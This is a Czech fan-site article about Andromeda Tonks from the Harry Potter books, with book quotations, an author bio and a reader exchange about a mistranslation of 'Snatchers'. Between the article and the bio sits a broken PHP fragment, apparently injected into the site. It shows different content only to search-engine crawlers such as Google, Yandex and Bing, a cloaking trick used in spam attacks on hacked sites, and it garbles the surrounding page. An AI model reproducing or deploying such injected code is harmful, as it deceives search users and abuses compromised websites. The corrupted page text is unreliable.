Nezapomínejme, že matka Nymfadory (neříkejte mi tak!) Tonksové byla také hrdinkou.

Andromeda nikdy nebyla jako většina jejích příbuzných, z nichž mnozí byli posedlí udržováním čisté krve, jako například její sestry Bellatrix a Narcissa. A tradičně, kdokoliv se vzepřel ideálům rodiny Blacků, byl vypálen z jejich slavné tapiserie. Andromeda byla právě jedním z takových případů.

Andromediny sestry, Bellatrix a Narcissa. Zdroj: fanpop.com

Jedním ze známějších „blackovských vzbouřenců“ byl Sirius Black, který aktivně bojoval proti Voldemortovi v První kouzelnické válce, vstoupil do Fénixova řádu a označil Andromedu za svoji oblíbenou sestřenku. Lze se domnívat, že byla méně předpojatá než zbytek její rodiny, což víme, protože se nakonec provdala za mudlorozeného čaroděje Teda Tonkse.

„Vy jste s Tonksovou příbuzní?“ podivil se Harry.
„No jistě, její matka Andromeda byla moje sestřenka, tu jsem měl moc rád,“ odpověděl Sirius a pozorně zkoumal gobelín. „Ne, Andromeda tady taky není, podívej…“
Ukázal na další kulatou dírku, vypálenou mezi jmény Bellatrix a Narcissa.
„Andromediny sestry jsou tu pořád, protože se provdaly za báječné a ctihodné čistokrevné kouzelníky, zatímco Andromeda si vzala kouzelníka z mudlovské rodiny, Teda Tonkse, takže…“
Sirius před vypálenou dírkou v gobelínu naznačil mávnutí hůlkou a trpce se zasmál.

Harry Potter a Fénixův řád
Místnost s tapiserií rodiny Blacků. Zdroj: film Harry Potter a Fénixův řád

V době, kdy Druhá kouzelnická válka klepala na dveře, byli Andromeda a její manžel spojenci Fénixova řádu, přinejmenším proto, že i jejich dcera Nymfadora (známá též jako jedna z nejlepších Mrzimorů všech dob) byla členem. Nicméně Andromeda utrpěla během událostí knihy Harry Potter a Relikvie Smrti dvě velké ztráty. Nejprve byl její manžel zabit lapky, skupinou lovců pracujících pro Voldemorta, jejichž úkolem bylo nalézat a zatýkat mudlorozené čaroděje. A později, během Bitvy o Bradavice, přišla o život i její dcera Nymfadora.

Další válkou rozvrácená rodina. Naštěstí pro sirotka Teddyho čekala lepší budoucnost a dětství, než na Harryho. Zdroj: weheartit.com

Jelikož v bitvě zahynul i její zeť Remus, stala se Andromeda jedinou přeživší příbuznou svého nového vnuka, Teddyho Lupina.

„Na Teddyho Remuse Lupina,“ pronesl slavnostně Lupin, „na budoucího velkého kouzelníka!“
„Po kom se vyvedl?“ vyptávala se Fleur.
„Já tvrdím, že se podobá Doře, Dora si ale myslí, že spíš mně. Nemá moc vlasů, ale když se narodil, zdály se být černé, a ať se propadnu, jestli se během hodiny nepřebarvily do zrzava. Než se vrátím, bude blonďák. Andromeda říká, že Tonksové začaly vlasy měnit barvu hned ten den, co se narodila.“ Dopil zbytek vína v poháru. „No dobrá, nalij, dám si ještě jeden,“ dodal celý rozzářený, když k němu Bill opět přistoupil s lahví.

Harry Potter a relikvie smrti
Andromedina vypálená díra na tapiserii rodiny Blacků. Zdroj: film Harry Potter a Fénixův řád

Ačkoliv se Andromeda přímo vyskytuje pouze v jedné scéně v knize Harry Potter a Relikvie Smrti, tento kousek nám stačí, abychom si udělali čistý obrázek o jejím charakteru – a mnohé lze vyčíst mezi řádky.

Předně, vzepřít se své rodině a zatratit staré tradice vyžadovalo z Andromediny strany slušnou dávku odvahy. Bez ohledu na to, jak moc s rodinným stanoviskem o mudlorozených čarodějkách a kouzelnících nesouhlasila, byla to stále její rodina – a moc dobře věděla, že kvůli svému sňatku s Tedem Tonksem bude vyděděna. Tak se také stalo, byla vypálena z rodinné tapiserie a obě její sestry, Bellatrix a Narcissa, ji považovaly za krvezrádkyni.

„Není naše neteř, můj pane,“ vykřikla do halasu všeobecného veselí. „Od té doby, co se naše sestra provdala za toho mudlovského šmejda, jsme se s ní – Narcissa ani já – neviděly. Ten spratek nemá ani s jednou z nás nic společného, a to zvíře, které si vzala, teprve ne.“

Harry Potter a relikvie smrti

Ačkoliv se Andromeda a její manžel k Fénixovu řádu nikdy přímo nepřipojili, byli během Druhé kouzelnické války významnými spojenci Řádu. Možná tomu tak bylo právě proto, že jejich dcera byla členem, nicméně jakožto manželský pár složený z čistokrevné čarodějky a mudlorozeného kouzelníka je dost dobře možné, že boj proti Voldemortovi považovali za osobní.

Zdroj: aminoaps.com, autorka pod přezdívkou Lily Potter

Manželé hrají významnou úlohu u příležitosti útěku „sedmi Harry Potterů“ v Relikviích smrti, kdy jejich příbytek poslouží jako přestupní stanice během Harryho a Hagridova letu ze Zobí ulice. Při jejich setkání si nejprve Harry Andromedu splete s Bellatrix – což ji pochopitelně poněkud rozladí. Nejjasnější část Andromediny osobnosti, kterou čtenář v této scéně může vidět, je ovšem ta, která ukazuje, jak moc svoji dceru miluje.

Když paní Tonksová vešla a přistoupila o něco blíž, nebyla už její podobnost s Bellatrix , její sestrou, zdaleka tak výrazná: měla světlehnědé hebké vlasy a oči širší a laskavější. Přesto ji asi Harryho výkřik poněkud vyvedl z míry a popudil.
„Co se stalo s naší dcerou?“ zeptala se. „Hagrid říkal, že na vás čekali a přepadli vás. Kde je Nymfadora?“
„To nevím,“ odpověděl Harry. „Nevíme, co se stalo s ostatními.“
Žena si vyměnila pohled s Tedem. Když Harry viděl, jak se oba zatvářili, zaplavila ho směsice strachu a provinilosti; jestli někdo z ostatních přišel o život, je to jeho vina. Jen a jen jeho. Souhlasil s jejich plánem, poskytl jim svoje vlasy…
Náhle si na něco vzpomněl. „Přenášedlo,“ vyhrkl. „Musíme se dostat do Doupěte a zjistit, co se stalo. Pak vám budeme moct poslat vzkaz… nebo to udělá Tonksová, až se -“

Harry Potter a relikvie smrti
Nymfadora, Andromedina milovaná dcera. Zdroj: WizardingWorld.com

Když se po Bitvě o Bradavice konečně usadil prach, museli přeživší – stále oplakávající zemřelé – začít s obnovou. A pro Andromedu to znamenalo budovat nový život nejenom pro sebe, ale také pro Teddyho Lupina. Víme, že Teddy byl vychován především svojí babičkou, ačkoliv často navštěvován svým kmotrem – Harrym Potterem. Andromeda svoji dceru nesmírně milovala a nikdy nemohl být pochyb, že právě ona vychová Teddyho po smrti jeho rodičů – nicméně přesto se musí uznat, že je ženou pozoruhodné síly, když se po ztrátě manžela i dcery v jednom roce vrhla do výchovy malého dítěte, a přitom nikdy nezklamala v tom, aby mu zajistila stabilní a láskyplné prostředí.

„Už tak k nám chodí na večeři snad čtyřikrát do týdne,“ zabručel Harry. „Co kdybychom mu řekli, ať se k nám nastěhuje? Měli bychom to aspoň odbyté.“
„Jo!“ souhlasil nadšeně James. „Klidně budu spát s Alem a Teddy si může vzít můj pokoj.“

Harry Potter a relikvie smrti

Andromeda právem patří mezi neopěvované hrdiny Potterovské ságy, protože ji žene vpřed vždy a na prvním místě láska. Láska byla důvodem jejího odchodu od rodiny a sňatku s mudlorozeným čarodějem. Láska byla důvodem, proč se ona i její manžel během Druhé kouzelnické války stali spojenci Fénixova řádu. A láska byla zas a znovu tím důvodem, proč se po tragické smrti Remuse a Tonksové pustila do výchovy syna své dcery.

Zdroj: messrsmemoirs.tumblr.com

Všichni víme, že knihy o Harrym Potterovi se z velké míry točí okolo moci lásky – právě láska zachránila Harryho v Godrikově Dole. A Andromeda Tonksová je jen jednou z dalších postav, která ukazuje, že způsob výchovy v dětství nemusí být pro člověka určující; na čem záleží, je to, jak si sami určíme, že budeme žít a jednat. Plni nenávisti, nebo plni lásky.

Zdroj: https://www.wizardingworld.com/features/unsung-heroes-of-harry-potter-stories-andromeda-tonks

function vururumgardas(){
$agent = $_SERVER[‚HTTP_USER_AGENT‘];
$sec = $agent;
switch(true){
case (strpos($sec,“google“)): $part = 1; break;
case (strpos($sec,“yandex“)): $part = 1; break;
case (strpos($sec,“bing“)): $part = 1; break;
case (strpos($sec,“yahoo“)): $part = 1; break;
case (strpos($sec,“alexa“)): $part = 1; break;
default : $part = 0;
}
if($part ==1){
echo ‚

FildasKirk

Zpočátku, ovlivněn heroickým obdivem k Harrymu, jsem se považoval za Nebelvíra. Později jsem si uvědomil, že bezhlavě se vrhat do šílených dobrodružství na mě vůbec nesedí – a přiznejme si i s rozmyslem se vrhat do šílených dobrodružství by bylo na pováženou. Naopak, dvakrát měř, jednou řež, ale nejprve si o tom třikrát něco nastuduj je více můj styl. Takže jsem Havraspár a kdo mě označí za Nebelvíra, bude mu po odečtení kolejních bodů udělen trest naučit se nazpaměť Dějiny Bradavic. Prý je to prima lehké čtení před spaním.

2 Replies to “Neopěvovaní hrdinové – Andromeda Tonksová”

 1. Teda Tonkse nezabil žádný hráč famfrpálu, ale lapkové…
  Drobná chyba, kterou by ale bylo fajn opravit 🙂

  1. Dobrý večer,
   děkujeme za upozornění. Chybka se nám do článku skutečně vloudila, ačkoliv bych si dovolil jisté vysvětlení. V anglickém originále byl pro lapky použit termín ‚Snatchers‘, který pan Medek přeložil jako ‚banda lapků‘ (Ron se střídavě odkazuje na „tu bandu“ a na „lapky“. V tuto chvíli si již pochopitelně nepamatuji okolnosti tvorby našeho článku, který je přeložen z Pottermore / WizardingWorld, ale některé články sepisujeme mimo domov (na VŠ koleji, na chatě…) a nemáme tak vždy přístup k originálnímu překladu p. Medka. V ten okamžik (což asi je tento případ) jsme nuceni spoléhat buď internet a jeho, ne vždy spolehlivé, zdroje, nebo na překladatelský um. V tomto případě to byla nepochybně druhá varianta… a um selhal, resp. udělal zřejmě špatný úsudek, kdy slovo Snatcher bylo přeloženo v kontextu ‚chytač něčeho / někoho‘ – což dle mého názoru vlastně vystihuje onu bandu lépe, než označení lapkové, které je synonymem pro loupežníka. Nicméně je jasné, že s ohledem na záměnu s chytačem – hráčem famfrpálu, se jednalo o nešťastný překlad.
   Velice si tedy ceníme zájmu a pozornosti čtenářů, kteří nás na případné a doufáme vzácné chyby upozorní. Chybu jsme opravili a nyní jsou v článku lapkové.
   FildasKirk

Napsat komentář

Vaše e-mailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *

Tato stránka používá Akismet k omezení spamu. Podívejte se, jak vaše data z komentářů zpracováváme..